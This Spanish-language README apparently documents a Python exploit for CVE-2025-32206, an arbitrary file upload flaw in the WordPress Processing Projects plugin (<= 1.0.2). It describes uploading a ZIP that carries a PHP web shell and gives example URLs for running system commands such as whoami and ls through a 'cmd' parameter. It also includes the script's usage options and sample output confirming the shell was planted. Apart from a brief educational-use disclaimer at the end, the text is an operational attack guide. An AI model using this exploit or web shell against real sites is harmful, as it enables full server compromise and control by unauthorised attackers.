
WordPress Processing Projects Plugin <= 1.0.2 es vulnerable a Arbitrary File Upload
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"La vulnerabilidad de subida sin restricciones de archivos con tipo peligroso en LABCAT Processing Projects permite a atacantes subir una web shell a un servidor web. Esto puede llevar a un compromiso total."
Este script de exploit en Python ataca sitios WordPress que utilizan el plugin vulnerable Processing Projects (versión <= 1.0.2). El plugin maneja incorrectamente las subidas de archivos de usuarios autenticados, permitiéndoles subir archivos ZIP arbitrarios que incluyen código PHP ejecutable (web shells).
El script del exploit:
Nxploited.zip) que contiene una shell PHP maliciosa (Nxploit.php).http://target.com/wp-content/uploads/processing-projects/Nxploit.phpUna vez que la shell se ha subido correctamente, se puede usar para ejecutar comandos del sistema mediante el parámetro cmd. Ejemplos:
http://target.com/wp-content/uploads/processing-projects/Nxploit.php?cmd=whoami
http://target.com/wp-content/uploads/processing-projects/Nxploit.php?cmd=ls
Esta shell ejecuta comandos arbitrarios del sistema operativo y devuelve su salida directamente en la respuesta.
usage: CVE-2025-32206.py [-h] -u URL -un USERNAME -p PASSWORD
Exploit for CVE-2025-32206 | By Nxploited (Khaled Alenazi)
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress URL (e.g. http://target.com/wordpress)
-un, --username USERNAME WordPress admin username
-p, --password PASSWORD WordPress admin password
[+] CVE-2025-32206 | WordPress Processing Projects <= 1.0.2 - Arbitrary File Upload
[+] By Nxploited | Khaled Alenazi
[+] Created zip with shell: Nxploited.zip -> Nxploit.php
[+] Logged in successfully.
[+] Extracted form fields successfully.
[+] Upload request sent successfully.
[+] Shell executed at: http://target.com/wp-content/uploads/processing-projects/Nxploit.php
Este script se proporciona solo con fines educativos. El uso no autorizado de este exploit en sistemas que no poseas o para los que no tengas permiso explícito de prueba es ilegal y poco ético.
Sigue siempre las prácticas de divulgación responsable y utiliza esta herramienta solo en entornos controlados o con autorización explícita.
Por : Nxploited | Khaled Alenazi